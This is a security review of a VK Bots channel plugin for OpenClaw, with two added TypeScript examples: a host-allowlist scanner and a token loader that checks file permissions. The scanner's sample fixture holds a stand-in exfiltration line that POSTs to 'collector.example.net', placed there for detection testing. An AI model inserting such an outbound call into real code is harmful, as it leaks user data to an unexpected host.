Plugin v2026.1.1

ClawScan security

VK Bots Channel Plugin · ClawHub's context-aware review of the artifact, metadata, and declared behavior.

Scanner verdict

Benign · Mar 27, 2026, 3:16 PM
Verdict
benign
Confidence
high
Model
gpt-5-mini
Summary
The plugin’s code, docs, and runtime instructions are consistent with a VK Long Poll channel plugin and its requested items are proportional to that purpose.
Guidance
This plugin appears to do what it says: it connects OpenClaw to VK using a VK group token. Before installing, make sure you: (1) provide a VK group token scoped to only the permissions the bot needs and store it in the suggested secrets path (~/.openclaw/workspace/secrets/), (2) review the plugin code if you don't trust the publisher (the package uses VK API endpoints and local secret files only), and (3) confirm in package.json that the plugin declares compatibility with your OpenClaw host version. If you would rather not trust a community plugin with a VK token, run it in an isolated environment, or review and build the code locally rather than using a pre-built package.

Review Dimensions

Purpose & Capability
ok
Name/description (VK Bots channel plugin) match the code and README: the package implements a VK Long Poll direct-message channel and requires a VK group token for operation. There are no unrelated credentials, binaries, or install steps that don't belong to a channel plugin.
Instruction Scope
ok
SKILL.md instructs only to install the plugin, create a VK group token file under ~/.openclaw/workspace/secrets/, and run OpenClaw channel commands; runtime instructions and repo files reference only OpenClaw APIs, VK API endpoints (api.vk.com), and local secret storage. There is no instruction to read unrelated files or exfiltrate data to unexpected endpoints.
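The claim above (only api.vk.com and local secret storage are referenced) is the kind of thing worth checking mechanically on a cloned copy before installing. What follows is an added example, not code from the plugin or from ClawHub's scanner: it walks a checkout, extracts every http(s) URL literal from source and docs, and reports any hostname outside an allowlist. The allowlist containing only api.vk.com, the skipped directories, the reviewed file extensions and the sample tree it builds are all assumptions made for the example.

```typescript
// Added example, not code from the plugin or from ClawHub's scanner:
// an offline check that reproduces one step of the Instruction Scope review.
// It walks a plugin checkout, pulls every http(s) URL literal out of source
// and docs, and reports hostnames that are not on an allowlist. The allowlist
// is an assumption taken from the report text: only api.vk.com is expected.
import * as fs from "node:fs";
import * as os from "node:os";
import * as path from "node:path";

export const ALLOWED_HOSTS: ReadonlySet<string> = new Set(["api.vk.com"]);

// File types worth reading; dependencies and build output are skipped so a
// dependency's own docs do not drown out the plugin's references.
const REVIEW_EXTS = new Set([".ts", ".js", ".mjs", ".cjs", ".json", ".md", ".yml", ".yaml"]);
const SKIP_DIRS = new Set(["node_modules", "dist", ".git"]);

export interface HostHit { host: string; file: string; line: number }

function listFiles(dir: string, out: string[] = []): string[] {
  for (const entry of fs.readdirSync(dir, { withFileTypes: true })) {
    const full = path.join(dir, entry.name);
    if (entry.isDirectory()) {
      if (!SKIP_DIRS.has(entry.name)) listFiles(full, out);
    } else if (REVIEW_EXTS.has(path.extname(entry.name))) {
      out.push(full);
    }
  }
  return out;
}

/** Every hostname referenced by a URL literal under `dir`, with its location. */
export function findHosts(dir: string): HostHit[] {
  const hits: HostHit[] = [];
  for (const file of listFiles(dir)) {
    const lines = fs.readFileSync(file, "utf8").split(/\r?\n/);
    for (let i = 0; i < lines.length; i++) {
      // Host characters stop at "/", ":", quotes or whitespace; a sentence-ending
      // "." is stripped so URLs in prose do not yield a bogus host.
      const re = /https?:\/\/([A-Za-z0-9.-]+)/g;
      let m: RegExpExecArray | null;
      while ((m = re.exec(lines[i])) !== null) {
        hits.push({
          host: m[1].toLowerCase().replace(/\.+$/, ""),
          file: path.relative(dir, file),
          line: i + 1,
        });
      }
    }
  }
  return hits;
}

/** Referenced hosts outside the allowlist: each one needs a justification. */
export function unexpectedHosts(dir: string, allowed: ReadonlySet<string> = ALLOWED_HOSTS): HostHit[] {
  return findHosts(dir).filter((h) => !allowed.has(h.host));
}

/** Constructed sample tree standing in for a plugin checkout (not the real package). */
export function makeSamplePlugin(withExtraHost: boolean): string {
  const dir = fs.mkdtempSync(path.join(os.tmpdir(), "vk-plugin-"));
  fs.mkdirSync(path.join(dir, "src"));
  fs.mkdirSync(path.join(dir, "node_modules", "dep"), { recursive: true });
  fs.writeFileSync(path.join(dir, "src", "client.ts"),
    'const API = "https://api.vk.com/method/";\n' +
    (withExtraHost ? 'fetch("https://collector.example.net/upload", { method: "POST" });\n' : ""));
  fs.writeFileSync(path.join(dir, "README.md"),
    "Create a group token and store it under ~/.openclaw/workspace/secrets/.\n");
  // Noise that must be ignored: a dependency's README naming another host.
  fs.writeFileSync(path.join(dir, "node_modules", "dep", "README.md"), "See https://unrelated.example.org.\n");
  return dir;
}

// Stand-alone run on the constructed sample: reports the one extra host.
const demoDir = makeSamplePlugin(true);
for (const h of unexpectedHosts(demoDir)) console.log(`unexpected host ${h.host} at ${h.file}:${h.line}`);
fs.rmSync(demoDir, { recursive: true, force: true });
```

Run unexpectedHosts() against a cloned copy of the package rather than the installed node_modules tree. An empty result matches the review above; anything it reports is a host the publisher should be able to explain. A literal-scan like this cannot see URLs assembled at runtime, so it complements rather than replaces reading the code.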
Install Mechanism
ok
No installer that downloads arbitrary code is declared in the registry metadata; the package is a normal Node/TypeScript plugin with package.json and standard dev tooling. The repo is intended for npm publication (openclaw.install.npmSpec) and includes standard CI/release workflows. Nothing indicates a risky external download or an obfuscated install mechanism.
Credentials
note
The plugin operates with a VK group token (provided via token file, direct config, or an env var such as VK_GROUP_TOKEN). The registry metadata lists no required env vars, which is reasonable because the token is optional at install time, but users must supply a VK token for the plugin to function. Requesting a single VK token is proportional to the plugin's purpose; do not reuse a token with broader privileges than necessary.
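A token loader that honours the three sources named above, written here as an added example rather than the plugin's own code, shows the checks a reviewer would expect around a file-stored secret: the file must not be readable by other local users, the value is trimmed and sanity-checked, and error messages name the source but never the token. The precedence order (env var, then config, then file), the TokenError type and the file name vk-group-token are assumptions made for the example; VK_GROUP_TOKEN and the ~/.openclaw/workspace/secrets/ directory come from the report.

```typescript
// Added example, not the plugin's own loader: resolve a VK group token from
// the three sources the report lists (env var, direct config, token file)
// with the checks a reviewer would want before trusting the value. The
// precedence order, the TokenError type and the file name vk-group-token are
// assumptions made for this example; VK_GROUP_TOKEN and the
// ~/.openclaw/workspace/secrets/ directory come from the report.
import * as fs from "node:fs";
import * as os from "node:os";
import * as path from "node:path";

export const DEFAULT_TOKEN_FILE = path.join(
  os.homedir(), ".openclaw", "workspace", "secrets", "vk-group-token");

export interface TokenOptions {
  env?: Record<string, string | undefined>; // defaults to process.env
  token?: string;                           // token given directly in plugin config
  tokenFile?: string;                       // path of a file holding only the token
}

export type TokenSource = "env" | "config" | "file";
export interface TokenResult { token: string; source: TokenSource }

export class TokenError extends Error {}

// Refuse a secret file that other local users could read: a group token in a
// 0644 file is one cat(1) away from any process on the host.
function assertPrivate(file: string): void {
  const st = fs.statSync(file);
  if (!st.isFile()) throw new TokenError(`${file} is not a regular file`);
  if (process.platform !== "win32" && (st.mode & 0o077) !== 0) {
    const mode = (st.mode & 0o777).toString(8);
    throw new TokenError(`${file} is readable by group/others (mode ${mode}); run chmod 600 on it`);
  }
}

// Normalise and sanity-check the value. Messages name the source, never the
// token itself, so a failure can be logged without leaking the secret.
function validate(raw: string, source: TokenSource): TokenResult {
  const token = raw.trim();
  if (token.length === 0) throw new TokenError(`VK group token from ${source} is empty`);
  if (/\s/.test(token)) throw new TokenError(`VK group token from ${source} contains whitespace`);
  return { token, source };
}

export function resolveGroupToken(opts: TokenOptions = {}): TokenResult {
  const env = opts.env || process.env;
  // A set-but-empty env var is treated as a configuration error, not skipped.
  if (env.VK_GROUP_TOKEN !== undefined) return validate(env.VK_GROUP_TOKEN, "env");
  if (opts.token !== undefined) return validate(opts.token, "config");
  const file = opts.tokenFile || DEFAULT_TOKEN_FILE;
  if (!fs.existsSync(file)) {
    throw new TokenError(`no VK group token: set VK_GROUP_TOKEN, pass token in config, or create ${file}`);
  }
  assertPrivate(file);
  return validate(fs.readFileSync(file, "utf8"), "file");
}

// Stand-alone run against a constructed token file (not a real token).
const demoDir = fs.mkdtempSync(path.join(os.tmpdir(), "vk-secrets-"));
const demoFile = path.join(demoDir, "vk-group-token");
fs.writeFileSync(demoFile, "constructed-sample-token\n", { mode: 0o600 });
console.log(`token loaded from ${resolveGroupToken({ env: {}, tokenFile: demoFile }).source}`);
fs.rmSync(demoDir, { recursive: true, force: true });
```

The mode check is the part most worth keeping whatever loader the plugin actually uses: when you create the token file under ~/.openclaw/workspace/secrets/ as the guidance suggests, make the directory 0700 and the file 0600, and treat a loader that silently accepts a world-readable secret file as a finding.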
Persistence & Privilege
ok
The always flag is false and disable-model-invocation is left at its default, so the agent can invoke the plugin autonomously; both settings are appropriate for a channel plugin. The plugin does not request permanent system-wide privileges or attempt to modify other plugins' configuration.